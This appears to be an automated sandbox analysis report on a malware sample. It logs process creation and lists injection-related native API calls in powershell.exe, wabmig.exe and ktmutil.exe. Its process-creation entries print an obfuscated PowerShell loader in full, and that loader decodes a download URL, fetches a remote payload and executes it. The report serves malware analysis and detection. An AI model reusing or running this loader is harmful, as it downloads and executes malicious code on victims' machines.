          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaMod
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B35C0 NtCreateMutant,LdrInitializeThunk,10_2_219B35C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_219B2DF0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_219B2C70
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B3090 NtSetValueKey,10_2_219B3090
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B3010 NtOpenDirectoryObject,10_2_219B3010
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B4340 NtSetContextThread,10_2_219B4340
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B4650 NtSuspendThread,10_2_219B4650
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B39B0 NtGetContextThread,10_2_219B39B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2B80 NtQueryInformationFile,10_2_219B2B80
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2BA0 NtEnumerateValueKey,10_2_219B2BA0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2BF0 NtAllocateVirtualMemory,10_2_219B2BF0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2BE0 NtQueryValueKey,10_2_219B2BE0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2B60 NtClose,10_2_219B2B60
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2AB0 NtWaitForSingleObject,10_2_219B2AB0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2AD0 NtReadFile,10_2_219B2AD0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2AF0 NtWriteFile,10_2_219B2AF0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2DB0 NtEnumerateKey,10_2_219B2DB0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2DD0 NtDelayExecution,10_2_219B2DD0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B3D10 NtOpenProcessToken,10_2_219B3D10
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2D10 NtMapViewOfSection,10_2_219B2D10
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2D00 NtSetInformationFile,10_2_219B2D00
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2D30 NtUnmapViewOfSection,10_2_219B2D30
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B3D70 NtOpenThread,10_2_219B3D70
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2CA0 NtQueryInformationToken,10_2_219B2CA0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2CC0 NtQueryVirtualMemory,10_2_219B2CC0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2CF0 NtOpenProcess,10_2_219B2CF0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2C00 NtQueryInformationProcess,10_2_219B2C00
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2C60 NtCreateKey,10_2_219B2C60
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2F90 NtProtectVirtualMemory,10_2_219B2F90
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2FB0 NtResumeThread,10_2_219B2FB0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2FA0 NtQuerySection,10_2_219B2FA0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2FE0 NtCreateFile,10_2_219B2FE0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2F30 NtCreateSection,10_2_219B2F30
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2F60 NtCreateProcessEx,10_2_219B2F60
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2E80 NtReadVirtualMemory,10_2_219B2E80
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2EA0 NtAdjustPrivilegesToken,10_2_219B2EA0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2EE0 NtQueueApcThread,10_2_219B2EE0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B2E30 NtWriteVirtualMemory,10_2_219B2E30
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_0477E682 Sleep,NtProtectVirtualMemory,10_2_0477E682
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E44340 NtSetContextThread,LdrInitializeThunk,12_2_02E44340
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E43090 NtSetValueKey,LdrInitializeThunk,12_2_02E43090
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E44650 NtSuspendThread,LdrInitializeThunk,12_2_02E44650
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E435C0 NtCreateMutant,LdrInitializeThunk,12_2_02E435C0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42AF0 NtWriteFile,LdrInitializeThunk,12_2_02E42AF0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42AD0 NtReadFile,LdrInitializeThunk,12_2_02E42AD0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42BE0 NtQueryValueKey,LdrInitializeThunk,12_2_02E42BE0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_02E42BF0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_02E42BA0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42B60 NtClose,LdrInitializeThunk,12_2_02E42B60
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E439B0 NtGetContextThread,LdrInitializeThunk,12_2_02E439B0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42EE0 NtQueueApcThread,LdrInitializeThunk,12_2_02E42EE0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_02E42E80
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42FE0 NtCreateFile,LdrInitializeThunk,12_2_02E42FE0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42FB0 NtResumeThread,LdrInitializeThunk,12_2_02E42FB0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42F30 NtCreateSection,LdrInitializeThunk,12_2_02E42F30
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_02E42CA0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42C60 NtCreateKey,LdrInitializeThunk,12_2_02E42C60
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_02E42C70
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_02E42DF0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42DD0 NtDelayExecution,LdrInitializeThunk,12_2_02E42DD0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_02E42D30
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42D10 NtMapViewOfSection,LdrInitializeThunk,12_2_02E42D10
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E43010 NtOpenDirectoryObject,12_2_02E43010
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42AB0 NtWaitForSingleObject,12_2_02E42AB0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42B80 NtQueryInformationFile,12_2_02E42B80
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42EA0 NtAdjustPrivilegesToken,12_2_02E42EA0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42E30 NtWriteVirtualMemory,12_2_02E42E30
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42FA0 NtQuerySection,12_2_02E42FA0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42F90 NtProtectVirtualMemory,12_2_02E42F90
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42F60 NtCreateProcessEx,12_2_02E42F60
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42CF0 NtOpenProcess,12_2_02E42CF0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42CC0 NtQueryVirtualMemory,12_2_02E42CC0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42C00 NtQueryInformationProcess,12_2_02E42C00
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42DB0 NtEnumerateKey,12_2_02E42DB0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E43D70 NtOpenThread,12_2_02E43D70
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E42D00 NtSetInformationFile,12_2_02E42D00
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E43D10 NtOpenProcessToken,12_2_02E43D10
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003B9070 NtClose,12_2_003B9070
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003B91E0 NtAllocateVirtualMemory,12_2_003B91E0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003B8D50 NtCreateFile,12_2_003B8D50
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003B8EC0 NtReadFile,12_2_003B8EC0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003B8FC0 NtDeleteFile,12_2_003B8FC0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2F06D NtQueryInformationProcess,12_2_02C2F06D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7DDBA21_2_00007FFD9B7DDBA2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7DCDF61_2_00007FFD9B7DCDF6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_048CF4A86_2_048CF4A8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_048CF1606_2_048CF160
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_084600406_2_08460040
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A401AA10_2_21A401AA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198B1B010_2_2198B1B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A381CC10_2_21A381CC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197010010_2_21970100
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1A11810_2_21A1A118
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A4B16B10_2_21A4B16B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F17210_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B516C10_2_219B516C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3F0E010_2_21A3F0E0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A370E910_2_21A370E9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C010_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2F0CC10_2_21A2F0CC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219C739A10_2_219C739A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A403E610_2_21A403E6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198E3F010_2_2198E3F0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3132D10_2_21A3132D
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196D34C10_2_2196D34C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3A35210_2_21A3A352
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219852A010_2_219852A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C010_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199D2F010_2_2199D2F0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2027410_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1D5B010_2_21A1D5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A4059110_2_21A40591
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198053510_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3757110_2_21A37571
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2E4F610_2_21A2E4F6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3F43F10_2_21A3F43F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3244610_2_21A32446
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197146010_2_21971460
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3F7B010_2_21A3F7B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197C7C010_2_2197C7C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A475010_2_219A4750
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198077010_2_21980770
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A316CC10_2_21A316CC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199C6E010_2_2199C6E0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A4A9A610_2_21A4A9A6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219829A010_2_219829A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198995010_2_21989950
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B95010_2_2199B950
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199696210_2_21996962
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219668B810_2_219668B8
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE8F010_2_219AE8F0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219838E010_2_219838E0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198284010_2_21982840
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198A84010_2_2198A840
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199FB8010_2_2199FB80
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219BDBF910_2_219BDBF9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A36BD710_2_21A36BD7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3FB7610_2_21A3FB76
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3AB4010_2_21A3AB40
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1DAAC10_2_21A1DAAC
